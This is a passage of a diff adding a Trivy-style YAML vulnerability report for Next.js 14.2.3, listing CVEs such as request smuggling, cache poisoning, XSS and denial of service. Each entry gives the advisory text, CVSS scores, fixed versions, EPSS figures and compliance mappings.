References: + - https://access.redhat.com/security/cve/CVE-2025-59471 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c + - https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec + - https://github.com/vercel/next.js/releases/tag/v15.5.10 + - https://github.com/vercel/next.js/releases/tag/v16.1.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f + - https://nvd.nist.gov/vuln/detail/CVE-2025-59471 + - https://www.cve.org/CVERecord?id=CVE-2025-59471 + PublishedDate: '2026-01-26T22:15:52.89Z' + LastModifiedDate: '2026-02-13T15:03:20.29Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.347733333333334 + epss: 0.00027 + epss_percentile: 0.07874 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00108 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 04e5c6fdba912e88 + ruleId: CVE-2026-27980 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage' + title: CVE-2026-27980 + description: 'Next.js is a React framework for building full-stack web applications. + Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image + optimization disk cache (`/_next/image`) did not have a configurable upper bound, + allowing unbounded cache growth. An attacker could generate many unique image-optimization + variants and exhaust disk space, causing denial of service. This is fixed in version + 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, + including eviction of least-recently-used entries when the limit is exceeded. + Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately + possible, periodically clean `.next/cache/images` and/or reduce variant cardinality + (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and + `images.qualities`).' + remediation: https://avd.aquasec.com/nvd/cve-2026-27980 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id035 + - CWE-400 + raw: + VulnerabilityID: CVE-2026-27980 + VendorIDs: + - GHSA-3x4c-7xq6-9pq8 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 16.1.7, 15.5.14 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-27980 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:5dec13177768ddafe594e0b28117c9687a4df1799c6cf21c3db279c85cdce71f + Title: 'next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage' + Description: 'Next.js is a React framework for building full-stack web applications. + Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js + image optimization disk cache (`/_next/image`) did not have a configurable upper + bound, allowing unbounded cache growth. An attacker could generate many unique + image-optimization variants and exhaust disk space, causing denial of service. + This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, + including eviction of least-recently-used entries when the limit is exceeded. + Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not + immediately possible, periodically clean `.next/cache/images` and/or reduce + variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, + and `images.qualities`).' + Severity: MEDIUM + CweIDs: *id035 + VendorSeverity: + ghsa: 2 + nvd: 3 + redhat: 2 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N + V40Score: 6.9 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L + V3Score: 5.3 + References: + - https://access.redhat.com/security/cve/CVE-2026-27980 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd + - https://github.com/vercel/next.js/releases/tag/v16.1.7 + - https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8 + - https://nvd.nist.gov/vuln/detail/CVE-2026-27980 + - https://www.cve.org/CVERecord?id=CVE-2026-27980 + PublishedDate: '2026-03-18T01:16:04.957Z' + LastModifiedDate: '2026-03-18T19:52:54.307Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.345066666666668 + epss: 0.00022 + epss_percentile: 0.06354 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00088 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 868dbd425c7fc3b4 + ruleId: CVE-2026-29057 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'next.js: Next.js: HTTP request smuggling in rewrites' + title: CVE-2026-29057 + description: "Next.js is a React framework for building full-stack web applications.\ + \ Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js\ + \ rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS`\ + \ request using `Transfer-Encoding: chunked` could trigger request boundary disagreement\ + \ between the proxy and backend. This could allow request smuggling through rewritten\ + \ routes. An attacker could smuggle a second request to unintended backend routes\ + \ (for example, internal/admin endpoints), bypassing assumptions that only the\ + \ configured rewrite destination/path is reachable. This does not impact applications\ + \ hosted on providers that handle rewrites at the CDN level, such as Vercel. \ + \ The vulnerability originated in an upstream library vendored by Next.js. It\ + \ is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency\u2019s behavior\ + \ so `content-length: 0` is added only when both `content-length` and `transfer-encoding`\ + \ are absent, and `transfer-encoding` is no longer removed in that code path.\ + \ If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests\ + \ on rewritten routes at the edge/proxy, and/or enforce authentication/authorization\ + \ on backend routes." + remediation: https://avd.aquasec.com/nvd/cve-2026-29057 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id036 + - CWE-444 + raw: + VulnerabilityID: CVE-2026-29057 + VendorIDs: + - GHSA-ggv3-7p47-pfv8 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 16.1.7, 15.5.13 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-29057 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:4074e32bdcb36d75198ac9560fe4244edba80bb6731805115c47dcfbb97b302f + Title: 'next.js: Next.js: HTTP request smuggling in rewrites' + Description: "Next.js is a React framework for building full-stack web applications.\ + \ Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js\ + \ rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS`\ + \ request using `Transfer-Encoding: chunked` could trigger request boundary\ + \ disagreement between the proxy and backend. This could allow request smuggling\ + \ through rewritten routes. An attacker could smuggle a second request to unintended\ + \ backend routes (for example, internal/admin endpoints), bypassing assumptions\ + \ that only the configured rewrite destination/path is reachable. This does\ + \ not impact applications hosted on providers that handle rewrites at the CDN\ + \ level, such as Vercel. The vulnerability originated in an upstream library\ + \ vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating\ + \ that dependency\u2019s behavior so `content-length: 0` is added only when\ + \ both `content-length` and `transfer-encoding` are absent, and `transfer-encoding`\ + \ is no longer removed in that code path. If upgrading is not immediately possible,\ + \ block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy,\ + \ and/or enforce authentication/authorization on backend routes." + Severity: MEDIUM + CweIDs: *id036 + VendorSeverity: + ghsa: 2 + nvd: 2 + redhat: 2 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N + V40Score: 6.3 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + V3Score: 6.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + V3Score: 6.5 + References: + - https://access.redhat.com/security/cve/CVE-2026-29057 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6 + - https://github.com/vercel/next.js/releases/tag/v15.5.13 + - https://github.com/vercel/next.js/releases/tag/v16.1.7 + - https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8 + - https://nvd.nist.gov/vuln/detail/CVE-2026-29057 + - https://www.cve.org/CVERecord?id=CVE-2026-29057 + PublishedDate: '2026-03-18T01:16:05.443Z' + LastModifiedDate: '2026-03-18T19:49:19.633Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.349866666666665 + epss: 0.00031 + epss_percentile: 0.0913 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00124 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e4364d984e862d8f + ruleId: CVE-2026-44576 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js vulnerable to cache poisoning in React Server Component responses + title: CVE-2026-44576 + description: Next.js is a React framework for building full-stack web applications. + From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components + can be vulnerable to cache poisoning when shared caches do not correctly partition + response variants. Under affected conditions, an attacker can cause an RSC response + to be served from the original URL and poison shared cache entries so later visitors + receive component payloads instead of the expected HTML. This vulnerability is + fixed in 15.5.16 and 16.2.5. + remediation: https://avd.aquasec.com/nvd/cve-2026-44576 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id037 + - CWE-436 + raw: + VulnerabilityID: CVE-2026-44576 + VendorIDs: + - GHSA-wfc6-r584-vfw7 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44576 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:3c9e2e46b20aad817d3abe8e7abd455ede89a3c4d8a51dc478704b39dba080bb + Title: Next.js vulnerable to cache poisoning in React Server Component responses + Description: Next.js is a React framework for building full-stack web applications. + From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components + can be vulnerable to cache poisoning when shared caches do not correctly partition + response variants. Under affected conditions, an attacker can cause an RSC response + to be served from the original URL and poison shared cache entries so later + visitors receive component payloads instead of the expected HTML. This vulnerability + is fixed in 15.5.16 and 16.2.5. + Severity: MEDIUM + CweIDs: *id037 + VendorSeverity: + ghsa: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L + V3Score: 5.4 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/releases/tag/v15.5.16 + - https://github.com/vercel/next.js/releases/tag/v16.2.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7 + - https://nvd.nist.gov/vuln/detail/CVE-2026-44576 + PublishedDate: '2026-05-13T17:16:23.04Z' + LastModifiedDate: '2026-05-14T13:44:18.27Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.341866666666666 + epss: 0.00016 + epss_percentile: 0.03853 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00064 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4721ee25bf757892 + ruleId: CVE-2026-44577 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js has a Denial of Service in the Image Optimization API + title: CVE-2026-44577 + description: Next.js is a React framework for building full-stack web applications. + From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default + image loader, the Image Optimization API fetches local images entirely into memory + without enforcing a maximum size limit. An attacker could cause out-of-memory + conditions by requesting large local assets from the /_next/image endpoint that + match the images.localPatterns configuration (by default, all patterns are allowed). + This vulnerability is fixed in 15.5.16 and 16.2.5. + remediation: https://avd.aquasec.com/nvd/cve-2026-44577 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id038 + - CWE-770 + raw: + VulnerabilityID: CVE-2026-44577 + VendorIDs: + - GHSA-h64f-5h5j-jqjh + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44577 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:9f08da120547fe06a6ff340ef05ca8e057af610a1e77041d7d119d2cea50fca0 + Title: Next.js has a Denial of Service in the Image Optimization API + Description: Next.js is a React framework for building full-stack web applications. + From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the + default image loader, the Image Optimization API fetches local images entirely + into memory without enforcing a maximum size limit. An attacker could cause + out-of-memory conditions by requesting large local assets from the /_next/image + endpoint that match the images.localPatterns configuration (by default, all + patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5. + Severity: MEDIUM + CweIDs: *id038 + VendorSeverity: + ghsa: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 5.9 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/releases/tag/v15.5.16 + - https://github.com/vercel/next.js/releases/tag/v16.2.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh + - https://nvd.nist.gov/vuln/detail/CVE-2026-44577 + PublishedDate: '2026-05-13T17:16:23.173Z' + LastModifiedDate: '2026-05-13T20:00:59.993Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.342933333333333 + epss: 0.00018 + epss_percentile: 0.0459 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00072 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 550fe8bea52b0c14 + ruleId: CVE-2026-44580 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js has cross-site scripting in beforeInteractive scripts with untrusted + input + title: CVE-2026-44580 + description: Next.js is a React framework for building full-stack web applications. + From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive + scripts together with untrusted content can be vulnerable to cross-site scripting. + In affected versions, serialized script content was not escaped safely before + being embedded into the document, which could allow attacker-controlled input + to break out of the intended script context and execute arbitrary JavaScript in + a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5. + remediation: https://avd.aquasec.com/nvd/cve-2026-44580 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id039 + - CWE-79 + raw: + VulnerabilityID: CVE-2026-44580 + VendorIDs: + - GHSA-gx5p-jg67-6x7h + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44580 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:271ac03a6853a4a85c0ed6629628a269cc75c889ec605033b36b7d5a63fe43fb + Title: Next.js has cross-site scripting in beforeInteractive scripts with untrusted + input + Description: Next.js is a React framework for building full-stack web applications. + From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive + scripts together with untrusted content can be vulnerable to cross-site scripting. + In affected versions, serialized script content was not escaped safely before + being embedded into the document, which could allow attacker-controlled input + to break out of the intended script context and execute arbitrary JavaScript + in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5. + Severity: MEDIUM + CweIDs: *id039 + VendorSeverity: + ghsa: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + V3Score: 6.1 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/releases/tag/v15.5.16 + - https://github.com/vercel/next.js/releases/tag/v16.2.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h + - https://nvd.nist.gov/vuln/detail/CVE-2026-44580 + PublishedDate: '2026-05-13T18:16:18.26Z' + LastModifiedDate: '2026-05-14T18:33:34.17Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A03:2021 + cweTop25_2024: + - id: CWE-79 + rank: 1 + category: Injection + cisControlsV8_1: *id010 + nistCsf2_0: + - &id041 + function: DETECT + category: DE.CM + subcategory: DE.CM-8 + description: Vulnerability scans are performed + - *id011 + - *id012 + pciDss4_0: + - &id042 + requirement: 6.2.4 + description: Prevent XSS attacks in bespoke software + priority: CRITICAL + - *id013 + - *id014 + mitreAttack: + - &id043 + tactic: Initial Access + technique: T1190 + techniqueName: Exploit Public-Facing Application + subtechnique: '' + subtechniqueName: '' + - *id015 + priority: + priority: 13.339733333333335 + epss: 0.00012 + epss_percentile: 0.01845 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00048 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ffcab1bb08bb5e14 + ruleId: CVE-2026-44581 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js vulnerable to cross-site scripting in App Router applications using + CSP nonces + title: CVE-2026-44581 + description: Next.js is a React framework for building full-stack web applications. + From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on + CSP nonces can be vulnerable to stored cross-site scripting when deployed behind + shared caches. In affected versions, malformed nonce values derived from request + headers could be reflected into rendered HTML in an unsafe way, allowing an attacker + to poison cached responses and cause script execution for later visitors. This + vulnerability is fixed in 15.5.16 and 16.2.5. + remediation: https://avd.aquasec.com/nvd/cve-2026-44581 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id040 + - CWE-79 + raw: + VulnerabilityID: CVE-2026-44581 + VendorIDs: + - GHSA-ffhc-5mcf-pf4q + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44581 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:6f2ba23fa5d8ac9fe972f5c6d8249e305d739b420e200ac40e762626f914dc86 + Title: Next.js vulnerable to cross-site scripting in App Router applications using + CSP nonces + Description: Next.js is a React framework for building full-stack web applications. + From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely + on CSP nonces can be vulnerable to stored cross-site scripting when deployed + behind shared caches. In affected versions, malformed nonce values derived from + request headers could be reflected into rendered HTML in an unsafe way, allowing + an attacker to poison cached responses and cause script execution for later + visitors. This vulnerability is fixed in 15.5.16 and 16.2.5. + Severity: MEDIUM + CweIDs: *id040 + VendorSeverity: + ghsa: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N + V3Score: 4.7 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/releases/tag/v15.5.16 + - https://github.com/vercel/next.js/releases/tag/v16.2.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q + - https://nvd.nist.gov/vuln/detail/CVE-2026-44581 + PublishedDate: '2026-05-13T18:16:18.4Z' + LastModifiedDate: '2026-05-14T18:30:24.34Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A03:2021 + cweTop25_2024: + - id: CWE-79 + rank: 1 + category: Injection + cisControlsV8_1: *id010 + nistCsf2_0: + - *id041 + - *id011 + - *id012 + pciDss4_0: + - *id042 + - *id013 + - *id014 + mitreAttack: + - *id043 + - *id015 + priority: + priority: 13.352000000000002 + epss: 0.00035 + epss_percentile: 0.10495 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0014 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f36c532127e73145 + ruleId: CVE-2025-32421 + severity: LOW + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'next.js: Next.js Race Condition to Cache Poisoning' + title: CVE-2025-32421 + description: 'Next.js is a React framework for building full-stack web applications. + Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This + issue only affects the Pages Router under certain misconfigurations, causing normal + endpoints to serve `pageProps` data instead of standard HTML. This issue was patched + in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from + incoming requests. Applications hosted on Vercel''s platform are not affected + by this issue, as the platform does not cache responses based solely on `200 OK` + status without explicit `cache-control` headers. Those who self-host Next.js deployments + and are unable to upgrade immediately can mitigate this vulnerability by stripping + the `x-now-route-matches` header from all incoming requests at the content development + network and setting `cache-control: no-store` for all responses under risk. The + maintainers of Next.js strongly recommend only caching responses with explicit + cache-control headers.' + remediation: https://avd.aquasec.com/nvd/cve-2025-32421 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id044 + - CWE-362 + raw: + VulnerabilityID: CVE-2025-32421 + VendorIDs: + - GHSA-qpjv-v59x-3qc4 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 14.2.24, 15.1.6 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-32421 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:64a9f428dd88df3e06576561410dff61f0fec0914799e7cfd4827204eba10d1b + Title: 'next.js: Next.js Race Condition to Cache Poisoning' + Description: 'Next.js is a React framework for building full-stack web applications. + Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This + issue only affects the Pages Router under certain misconfigurations, causing + normal endpoints to serve `pageProps` data instead of standard HTML. This issue + was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` + header from incoming requests. Applications hosted on Vercel''s platform are + not affected by this issue, as the platform does not cache responses based solely + on `200 OK` status without explicit `cache-control` headers. Those who self-host + Next.js deployments and are unable to upgrade immediately can mitigate this + vulnerability by stripping the `x-now-route-matches` header from all incoming + requests at the content development network and setting `cache-control: no-store` + for all responses under risk. The maintainers of Next.js strongly recommend + only caching responses with explicit cache-control headers.' + Severity: LOW + CweIDs: *id044 + VendorSeverity: + ghsa: 1 + redhat: 1 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N + V3Score: 3.7 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N + V3Score: 3.7 + References: + - https://access.redhat.com/security/cve/CVE-2025-32421 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4 + - https://nvd.nist.gov/vuln/detail/CVE-2025-32421 + - https://vercel.com/changelog/cve-2025-32421 + - https://www.cve.org/CVERecord?id=CVE-2025-32421 + PublishedDate: '2025-05-14T23:15:47.87Z' + LastModifiedDate: '2025-09-10T15:16:10.053Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cweTop25_2024: + - id: CWE-362 + rank: 21 + category: Race Condition + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 6.867200000000001 + epss: 0.00752 + epss_percentile: 0.73386 + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.03008 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1ce95f8bcd69d427 + ruleId: CVE-2025-48068 + severity: LOW + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'next.js: Information exposure in Next.js dev server due to lack of origin + verification' + title: CVE-2025-48068 + description: Next.js is a React framework for building full-stack web applications. + In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, + Next.js may have allowed limited source code exposure when the dev server was + running with the App Router enabled. The vulnerability only affects local development + environments and requires the user to visit a malicious webpage while npm run + dev is active. This issue has been patched in versions 14.2.30 and 15.2.2. + remediation: https://avd.aquasec.com/nvd/cve-2025-48068 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id045 + - CWE-1385 + raw: + VulnerabilityID: CVE-2025-48068 + VendorIDs: + - GHSA-3h52-269p-cp9r + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.2.2, 14.2.30 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-48068 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:69e57f7a20f65a73ee7bd893aee36db195599076d8c92184edf8fe2c2707d9a6 + Title: 'next.js: Information exposure in Next.js dev server due to lack of origin + verification' + Description: Next.js is a React framework for building full-stack web applications. + In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, + Next.js may have allowed limited source code exposure when the dev server was + running with the App Router enabled. The vulnerability only affects local development + environments and requires the user to visit a malicious webpage while npm run + dev is active. This issue has been patched in versions 14.2.30 and 15.2.2. + Severity: LOW + CweIDs: *id045 + VendorSeverity: + ghsa: 1 + nvd: 2 + redhat: 2 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N + V40Score: 2.3 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N + V3Score: 4.3 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N + V3Score: 4.3 + References: + - https://access.redhat.com/security/cve/CVE-2025-48068 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r + - https://nvd.nist.gov/vuln/detail/CVE-2025-48068 + - https://vercel.com/changelog/cve-2025-48068 + - https://www.cve.org/CVERecord?id=CVE-2025-48068 + PublishedDate: '2025-05-30T04:15:48.51Z' + LastModifiedDate: '2025-09-10T15:17:38.677Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 6.693600000000001 + epss: 0.00101 + epss_percentile: 0.2732 + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.00404 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e32b41f01db1c199 + ruleId: CVE-2026-44572 + severity: LOW + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js's Middleware / Proxy redirects can be cache-poisoned + title: CVE-2026-44572 + description: Next.js is a React framework for building full-stack web applications. + From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data + header on a normal request to a path handled by middleware that returns a redirect. + When that happened, the middleware/proxy could treat the request as a data request + and replace the standard Location redirect header with the internal x-nextjs-redirect + header. Browsers do not follow 